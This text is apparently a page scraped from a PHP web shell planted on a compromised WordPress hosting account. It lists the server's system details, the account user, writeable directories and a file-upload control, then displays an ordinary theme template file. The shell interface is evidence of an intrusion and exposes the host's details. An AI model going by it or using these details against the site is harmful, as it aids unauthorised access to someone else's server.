Heray-Was-Here
Server : LiteSpeed
System : Linux server261.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : kinaybkk ( 1435)
PHP Version : 8.3.31
Disable Function : NONE
Directory :  /home/kinaybkk/public_html/wp-content/themes/gauge/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/kinaybkk/public_html/wp-content/themes/gauge/hub-template.php
<?php
/*
Template Name: Hub
*/

// Get post or hub association ID
$post_id = ghostpool_get_hub_id( get_the_ID() );

get_header(); ?>

<?php if ( have_posts() ) : while ( have_posts() ) : the_post(); ?>		
		
	<?php ghostpool_page_header( $post_id ); ?>
		
	<div id="gp-content-wrapper"<?php if ( $GLOBALS['ghostpool_layout'] != 'gp-fullwidth' ) { ?> class="gp-container"<?php } ?>>

		<div id="gp-content">

			<article <?php post_class(); ?>>
			
				<div class="gp-entry-content">
					
					<?php get_template_part( 'lib/sections/hub-details' ); ?>
				
					<?php if ( ( $GLOBALS['ghostpool_layout'] == 'gp-no-sidebar' OR $GLOBALS['ghostpool_layout'] == 'gp-fullwidth' ) && $GLOBALS['ghostpool_user_rating_box'] == 'enabled' ) { ?>
						<?php get_template_part( 'lib/sections/user-rating-box' ); ?>
					<?php } ?>

					<?php the_content(); ?>
			
				</div>

			</article>	

		</div>

		<?php get_sidebar(); ?>

	</div>
		
<?php endwhile; endif; ?>	
			
<?php get_footer(); ?>

Hry